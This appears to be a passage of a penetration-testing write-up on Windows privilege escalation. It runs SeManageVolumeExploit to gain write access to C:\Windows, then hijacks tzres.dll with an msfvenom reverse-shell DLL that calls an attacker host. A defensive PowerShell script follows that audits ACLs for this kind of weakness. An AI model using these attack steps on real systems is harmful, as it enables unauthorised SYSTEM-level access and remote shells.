```powershell
# https://github.com/CsEnox/SeManageVolumeExploit
# From Releases
SeManageVolumeExploit.exe
```

Upload **SeManageVolumeExploit.exe** to the target and execute it. After execution, we discover that the `BUILTIN\Users` group has full permissions on the Windows folder.

```powershell
C:\xampp\htdocs\uploads>icacls C:/Windows
C:/Windows NT SERVICE\TrustedInstaller:(F)
           NT SERVICE\TrustedInstaller:(CI)(IO)(F)
           NT AUTHORITY\SYSTEM:(M)
           NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
           BUILTIN\Users:(M)
           BUILTIN\Users:(OI)(CI)(IO)(F)
```

Now we can use those permissions on the Windows folder to hijack a DLL. I'll use `systeminfo`'s `tzres.dll`, but you should be able to use any `.dll`.

```powershell
# 1. Create a reverse shell named tzres.dll
msfvenom -p windows/x64/shell_reverse_tcp LHOST=lhost LPORT=lport -f dll > tzres.dll
# 2. Transfer that file into the C:\Windows\System32\wbem directory
# 3. Set up a listener on the attacker's Kali machine
# 4. Run systeminfo.exe
systeminfo
```
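A defender-side check for the ACL change visible in the `icacls` output above, as an added example (not part of the original write-up or of the SeManageVolumeExploit project): it flags allow ACEs that give low-privileged groups write-capable rights on the Windows directories the write-up touches. The function name, the SID list and the path list are assumptions made for this illustration.

```powershell
# Added example: audit Windows directories for write-capable ACEs held by
# low-privileged groups. Function name, SID list and paths are illustrative.

# Match well-known SIDs rather than names so the check works on localized systems.
$LowPrivSids = @(
    'S-1-5-32-545',  # BUILTIN\Users
    'S-1-5-11',      # NT AUTHORITY\Authenticated Users
    'S-1-1-0'        # Everyone
)

# Rights that allow planting or replacing a file, or rewriting the ACL itself.
$Risky = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
# Inherit-only ACEs such as (OI)(CI)(IO)(F) can surface as raw generic access bits.
$GenericAll   = 0x10000000
$GenericWrite = 0x40000000
$RiskyBits    = $Risky -bor $GenericAll -bor $GenericWrite

function Find-LowPrivWriteAce {
    param([Parameter(Mandatory)][string[]]$Path)

    foreach ($p in $Path) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $acl = Get-Acl -LiteralPath $p
        # Explicit and inherited rules, with trustees returned as SIDs.
        $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        foreach ($ace in $rules) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivSids -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band $RiskyBits) -eq 0) { continue }
            [pscustomobject]@{
                Path        = $p
                Sid         = $ace.IdentityReference.Value
                Rights      = $ace.FileSystemRights
                Inheritance = $ace.InheritanceFlags
                Propagation = $ace.PropagationFlags
                Inherited   = $ace.IsInherited
            }
        }
    }
}

# Directories named in the write-up, resolved from the local SystemRoot.
$targets = @(
    $env:SystemRoot,
    (Join-Path $env:SystemRoot 'System32'),
    (Join-Path $env:SystemRoot 'System32\wbem')
)
$findings = @(Find-LowPrivWriteAce -Path $targets)
if ($findings.Count -gt 0) { $findings | Format-Table -AutoSize }
else { 'No write-capable ACEs for low-privileged groups on the checked paths.' }
```

On a default installation these three directories grant `BUILTIN\Users` read and execute only, so any row this prints, such as the `(M)` and `(OI)(CI)(IO)(F)` entries shown above, warrants investigation.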